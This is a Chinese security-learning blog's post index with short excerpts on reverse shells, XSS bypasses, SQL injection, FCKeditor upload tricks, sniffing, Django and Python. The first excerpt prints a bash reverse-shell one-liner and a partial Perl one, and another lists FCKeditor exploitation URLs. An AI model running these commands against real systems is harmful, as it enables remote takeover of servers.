- 博客(61)
- 资源 (1)
- 收藏
- 关注
RSS订阅
转载 反弹shell的十种姿势
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(co
2016-03-07 11:44:04
2220
转载 php中Session的生成机制、回收机制和存储机制探究
session : Session直接翻译成中文比较困难,一般都译成时域。在计算机专业术语中,Session是指一个终端用户与交互系统进行通信的时间间隔,通常指从注册进入系统到注销退出系统之间所经过的时间。以及如果需要的话,可能还有一定的操作空间。具体到Web中的Session指的就是用户在浏览某个网站时,从进入。 cookie : Cookie,有时也用其复数形式Cookies,指
2015-12-09 11:23:09
612
转载 逆向工程(一):汇编、逆向工程基础篇
文章转自Freebuf,作者VillanCh,很精彩,担心下次再找,暂时保留下来以备学习查阅。如果你也喜欢,请联系作者转载!============================================逆向工程(一):汇编、逆向工程基础篇VillanCh2015-11-24共19147人围观,发现9个不明物体周边系统安全本文原创作者:V
2015-11-24 20:38:26
2100
原创 一次后门清除
最近学校的一个网站被挂了黑链,被叫去做技术支持= =! 简单介绍一下具体情况:访问网站根目录下的一个文件:http://www.demo.com/yule 显示的是黑链地址,但是我登录到服务器上定位到根目录的时候却找不到这个文件。开始以为是文件设置了隐藏,不过修改之后还是不可以。然后怀疑黑客在服务器上做了虚拟目录,然后全盘搜索文件“yule”,奇怪的是全部盘符下都没找到这个文件。真是日了狗
2015-10-30 22:28:48
5487
原创 HTTP状态码总结
当浏览者访问一个网页时,浏览者的浏览器会向网页所在服务器发出请求。当浏览器接收并显示网页前,此网页所在的服务器会返回一个包含HTTP状态码的信息头(server header)用以响应浏览器的请求。HTTP状态码的英文为HTTP Status Code。下面是常见的HTTP状态码:200 - 请求成功301 - 资源(网页等)被永久转移到其它URL404
2015-10-26 23:11:01
436
原创 Lynis基线检测使用解析
最近要做企业级的基线检测,虽然已经有了比较成熟的基线检测工具,但是搜索的时候看到Lynis这款工具,以前接触过,不过没有自己研究,刚好趁这个机会,学习一下这款工具的使用。 介绍 Lynis是一款开源的安全审计工具。功能主要是对Unix / Linux系统进行基线检测。 除了程序原有的配置外,同时也可以根据需要对配置文件的定制安装 下载地址:https://github.c
2015-09-12 10:43:12
8029
原创 域传送漏洞总结
抗战纪念日放了3天假,本来想回家呢,有个同学带着女朋友来学校玩,就只能在学校等他们了,刚好趁着这段时间,仔细学习了一下域传送漏洞,网上很多资料,这里整理只是为了做一个记录,加深印象,防止自己忘记…0x01:什么事域传送漏洞:DNS区域传送(DNS zone transfer)指的是一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库。这为运行中的DNS服务提供了一定的冗余度,其目的是
2015-09-04 22:54:59
2503
1
原创 CTF题目整理
最近在整理一些CTF题目,遇到很多很有意思的东西,记录下来0x01:栅栏加密栅栏加密法是一种比较简单快捷的加密方法。栅栏加密法就是把要被加密的文件按照一上一下的写法写出来,再把第二行的文字排列到第一行的后面。相应的,破译方法就是把文字从中间分开,分成2行,然后插入。栅栏加密法一般配合其他方法进行加密。例:加密information分行i f r a i nn o m t o合并if
2015-08-23 10:56:00
11178
转载 Python subprocess模块学习总结
从Python 2.4开始,Python引入subprocess模块来管理子进程,以取代一些旧模块的方法:如 os.system、os.spawn*、os.popen*、popen2.*、commands.*不但可以调用外部的命令作为子进程,而且可以连接到子进程的input/output/error管道,获取相关的返回信息一、subprocess以及常用的封装函数运行python的
2015-08-17 10:31:28
643
原创 Hacking Team 事件
昨天上午看到圈子里有人在讨论hacking team被黑引起的那个flash漏洞,准备晚上研究一下呢。下午在教室上自习备考期末,无奈对课本上的知识一点都不敏感,就刷刷微博,看到圈子里爆炸似的转载Hacking Team 400G数据流出的消息。更有手快者已经进行了分析。这400G数据像一颗重磅炸弹一样引爆了国内的安全圈子。我也在第一时间赶回宿舍,操起我的pc小水管开始下载,不过当然不是那400G了,
2015-07-08 22:17:53
997
原创 防火墙与入侵检测知识整理 (二)
最近整理点防火墙和入侵检测系统的东西,记录在这里。入侵检测系统:(intrusion detection system,简称“IDS”)是一种对网络传输进行即时监视,在发现可疑传输时发出警报或者采取主动反应措施的网络安全设备。它与其他网络安全设备的不同之处便在于,IDS是一种积极主动的安全防护技术。下面是一张入侵检测系统的基本模型简单的介绍一下图中模块的功能:探测器:又称数据收集器,负责收集入侵
2015-07-01 20:43:19
1821
原创 防火墙与入侵检测知识整理 (一)
最近整理点防火墙和入侵检测系统的东西,记录在这里。防火墙:是一种高级访问控制设备,置于不同的网络安全域之间的一些列部件的组合,它是不同网络安全域间通信流的唯一通道,能根据企业有关的安全策略控制(允许、拒绝、监视、记录)进出网络的访问行为。防火墙主要面临的安全威胁:通过更改防火墙配置参数和其它相关安全数据而展开的攻击攻击者利用高层协议和服务对内部受保护网络或主机进行的攻击绕开身份认证和鉴别机制
2015-07-01 20:13:18
8041
原创 DomXSS以及绕过浏览器检测机制方法总结
今天继续研究了一下PKAV“心伤的瘦子”的XSS系列教程,收获挺大的,这里主要记录下来,以备忘记! 下面是这个系列教程的截图,可以在这里看到,当让,每一个知识知识点,都可以在这里(传送门)得到复现。作为程序员,会让你意思到自己以前的编码方式中有诸多的不足,作为安全研究者,深深地感觉到,原来还可以这么玩….昨天的知识点忘记整理了,先吧今天的写上,以后再补: **DOM_XSS之iframe标签的变
2015-06-27 02:44:56
8900
原创 宽字节编码类型的XSS
今晚又看了一遍PKAV-心上的瘦子写的xss腾讯系列的例子,收获挺大的,其中对宽字节注入有了更深的了解,又查找了一些相关的资料,整理一下,以备以后查阅 参考文档: http://book.2cto.com/201301/14515.html http://itindex.net/detail/47408-xss-%E5%AD%A6%E4%B9%A0-xss http://ww
2015-06-25 00:40:52
3663
原创 Git常用命令
没写过什么大的项目,也根本没接触过版本控制。这学期接触到软件工程这门课之后才知道有这么个东西。以前用过SVN。今天用了一下午+晚上的时间学习了一下Git的基本应用,参考的是廖雪峰老师的教程: 廖雪峰Git http://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000实验的环境是:VM虚
2015-06-07 23:28:49
494
原创 Python 中的struct
参考资料: http://docs.python.org/library/struct.html#module-struct http://blog.sina.com.cn/s/blog_75e9551f01016dhp.html http://python.jobbole.com/81554/相对于其他的编程语言,Python中的数据类型只有六种:字符串
2015-06-07 01:31:26
2129
原创 Python Socket 通信
一、套接字套接字是为特定网络协议(例如TCP/IP,ICMP/IP,UDP/IP等)套件对上的网络应用程序提供者提供当前可移植标准的对象。它们允许程序接受并进行连接,如发送和接受数据。为了建立通信通道,网络通信的每个端点拥有一个套接字对象极为重要。套接字为BSD UNIX系统核心的一部分,而且他们也被许多其他类似UNIX的操作系统包括Linux所采纳。许多非BSD UNIX系统(如ms-dos,wi
2015-06-05 00:36:40
888
原创 Python中thread 多线程处理
参考文章: Python模块学习 —- thread 多线程处理 http://python.jobbole.com/81544/Python 标准库提供了 thread 和 threading 两个模块来对多线程进行支持。其中, thread 模块以低级、原始的方式来处理和控制线程,而 threading 模块通过对 thread 进行二次封装,提供了更方便的 api 来处理线
2015-06-04 17:29:27
557
原创 谁是罪犯逻辑问题
今天看到一个又看到了那个好玩的逻辑问题:抓了a,b,c,d4名犯罪嫌疑人.其中有一名是小偷,审讯中: a说我不是小偷 b说c是小偷 c说小偷肯定是d d说c胡说! 其中有3个人说的是实话,一个人说的是假话,编程推断谁是小偷。以前看到过这个问题,但是当时没想到好办法。现在,用Python实现一下吧:__author__ = 'CX-15'#coding:utf-8for thief in
2015-06-03 21:50:08
2649
原创 UCTF WriteUp
第一题是关于BrainFuck语言的,没啥说的,直接编译就行了。 看到没有,Key直接出来了。 KEY{wjTdUoAgqzxxnjfa9kan} 推荐给大家一个比较好的网站:http://esoteric.sange.fi/brainfuck/impl/interp/i.html2. 首先看到第二张图片是著名的“猪圈密码”,这个可能对于没有接触过CTF的同学来说比较陌生,不过没
2015-06-01 22:44:35
1247
原创 爬取某在线恶意软件仓库病毒文件进行分析
前段时间,因为最近工作需要,要收集一些木马文件,于是就找到了一个网站:VirusShare.com,在这里,研究者可以提交并获得恶意软件的样本。该网站实时更新来自全球的恶意文件样本。本来打算自己动手下载呢,但是特征文件更新比较慢,等好久才会出现一个我想要的文件。刚好当时也在写Python的爬虫,就写了一个爬虫来爬。后来实验的效果果然不错,一晚上就把我一星期的工作量就完成了。又一次说明一个道理:代码解
2015-06-01 13:27:47
3493
8
原创 Python中设置输出文字的颜色
在实习公司,公司的leader最近布置的任务是在一些网站下载一些文件,然后上传到web服务器。开始的时候手动下载了几个,实在太麻烦了,刚好自己正在写Python,就直接写了一个小爬虫。 因为涉及到公司的一些信息,爬虫的代码在这里就不展示了。不过在写的过程中发现了一个挺有意思的东西—Python输出文字颜色的设置,在这里记录下来: class bcolors: HEADER =
2015-05-12 15:38:18
16204
1
原创 Django HTTP请求的处理流程
Django 和其他 Web 框架的 HTTP 处理的流程大致相同,Django 处理一个 Request 的过程是首先通过中间件,然后再通过默认的 URL 方式进行的。我们可以在 Middleware 这个地方把所有 Request 拦截住,用我们自己的方式完成处理以后直接返回 Response。 1. 加载配置Django 的配置都在 “Project/settings.py” 中定义,可以是
2015-05-11 01:23:34
695
原创 Python中url.py的配置
urls.py的配置写法一般有三种方式。1、第一种是导入视图的方式,就是 The Django Book 里面样例的写法: from blog.views import index url(r'^nowamagic/', index) 2、 第二种方法是视图处理方法,看代码就知道是怎么回事了。url(r'^nowamagic/', 'test.views.index')3、第三种是把模型与
2015-05-10 14:15:31
1535
原创 Python 中Url.py的调度
RegexURLResolver.reslove() 调用的理解。假设工程名为 mysite,并且创建了 app people。from django.conf.urls import patterns, include, urlurlpatterns = patterns('', url(r"^$","mysite.views.index"), url(r"^about/","
2015-05-10 14:12:12
598
原创 Python中的URL模式
URL模式是指在Django urls模块中,名为urlpatterns的元组中包含的每一个值。通常由patterns方法生成urlpatterns元组的内容。每个URL模式都需要指定如下几个内容:一个正则表达式字符串。一个可调用对象,通常为一个视图函数或一个指定视图函数路径的字符串。可选的要传递给视图函数的默认参数(字典形式)。一个可选的name参数。路径前缀,加在视图函数路径字符串的前面
2015-05-10 14:08:28
1067
原创 Django是如何处理URLconf的?
URL配置(URLconf)就像是 Django 所支撑网站的目录。它的本质是 URL 模式以及要为该 URL 模式调用的视图函数之间的映射表。 你就是以这种方式告诉 Django,对于这个 URL 调用这段代码,对于那个 URL 调用那段代码。 例如,当用户访问/foo/时,调用视图函数foo_view(),这个视图函数存在于Python模块文件view.py中。执行 django-admin.p
2015-05-10 14:03:59
1319
原创 Django开发的URL的基本配置
最近在做Python Django的开发。过程中遇到的困难主要是在开始阶段配置url的时候。现在做一下总结: 参考资料: http://www.nowamagic.net/academy/detail/13281005 http://www.nowamagic.net/academy/detail/13281014 http://www.nowamagic.net/academy/detai
2015-05-10 13:57:25
406
转载 FCK上传总结
适合asp站点 1、浏览查看文件 http://127.0.0.1/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http://127.0.0.1/fckeditor/editor/filemanager/connectors/asp/connector.asp 2、创建asp.asp文件夹 http:
2015-05-05 22:41:09
1516
转载 TCP三次握手和四次握手以及SYN攻击
相对于SOCKET开发者,TCP创建过程和链接折除过程是由TCP/IP协议栈自动创建的.因此开发者并不需要控制这个过程.但是对于理解TCP底层运作机制,相当有帮助.而且对于有网络协议工程师之类笔试,几乎是必考的内容.企业对这个问题热情之高,出乎我的意料:-)。有时上午面试前强调这个问题,并重复讲一次,下午几乎每一个人都被问到这个问题。因此在这里详细解释一下这两个过程。TCP三次握手所谓三次握手(Th
2015-04-23 21:03:47
1109
原创 一次钓鱼电话
今天晚上,在宿舍里看OWASP Top10呢,手机来电话了,是一个陌生的号码,接通之后对面说自己是某某厂家,问我昨晚上是不是在当当购买了,我说是。然后她就在说我的个人信息,电话号码,收件地址等等,还在说我几点几分下的单。每一点都说的非常准确,可以肯定,我的订单他手里是有的。然后说昨天晚上他们的系统出现问题,我的账单没有进入数据库什么云云,之后说为了按时发货,会给我的手机上发送一个重新提交订单的信息
2015-04-21 22:48:02
1005
1
转载 实例讲解SQL注入
最近整理一些基础知识,看到这篇文章,介绍的非常详细,转载过来收藏,也为了大家能够看到这篇优秀的文章。一位客户让我们针对只有他们企业员工和顾客能使用的企业内网进行渗透测试。这是安全评估的一个部分,所以尽管我们之前没有使用过SQL注入来渗透网络,但对其概念也相当熟悉了。最后我们在这项任务中大获成功,现在来回顾一下这个过程的每一步,将它记录为一个案例。“SQL注入”是一种利用未过滤/未审核用户输入的攻击方
2015-04-19 00:03:15
580
转载 某电商网站流量劫持案例分析与思考
【前言】自腾讯与京东建立了战略合作关系之后,笔者网上购物就首选京东了。某天在家里访问京东首页的时候突然吃惊地发现浏览器突然跳到了第三方网站再回到京东,心里第一个反应就是中木马了。竟然有这样的事,一定要把木马大卸八块。【原因排查】首先在重现的情况下抓包,京东官网确实返回了一段JavaScript让浏览器跳转到了yiqifa.com。下图是应用层的抓包。 服务器返回的代码导致跳转,基本可以排除本地
2015-04-15 01:27:53
775
转载 Linux常用命令
今天面了导师给推荐的一家做安全的公司。做技术的公司,大家也都是开门见山,没那么多多余的细节,直接进行技术面试。开始问了一下TCP/IP的问题,自己感觉答的还不错,但是后来开始问一些关于Linux的问题,因为平时主要在Win下进行操作,所以对于Linux的了解也只是平时开Kali的时候才接触一些。所以后来关于Linux的一些东西自己答的很失败,今天回来查了一些资料,整理了一下,记录在这里
2015-04-10 21:48:32
379
原创 利用NetFuke进行内网嗅探
利用NetFuke进行内网嗅探今天在论坛里看到一哥们利用工具嗅探隔壁女神信息并最终搞定女神所有的隐私信息的故事,哈哈,感觉挺好玩的,晚上刚好没事,就研究看一番。使用工具:NetFuke嗅探工具 测试环境:VMware平台、xp虚拟机、Kali虚拟机在使用NetFuck之前,电脑上必须安装的一个插件是Winpcap,这是一款基于windows平台下一个免费,公共的网络访问系统。开发winpcap这个
2015-03-18 01:23:51
32125
3
原创 Python IDLE基本设置
Python编辑器IDLE入门 running在编辑器窗口按F5即可在PythonShell中看到程序运行结果。debug1.设置断点:在Python编辑器中要调试的代码行右击->SetBreakpoint,之后该行底色就变黄了2.打开debugger:PythonShell->Debug->Debugger3.编辑窗口按F5IDLE编辑器快捷键
2015-01-23 20:47:48
11322
转载 从信息收集到入侵提权
通过本文你将了解黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的.阅读本文你会学到以下内容:1.渗透测试前的简单信息收集。2.sqlmap的使用3.nmap的使用4.nc反弹提权5.linux系统的权限提升6.backtrack 5中渗透测试工具nikto和w3af的使用等.假
2014-12-22 14:10:42
1138
struts2045修复建议及补丁
2018-01-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人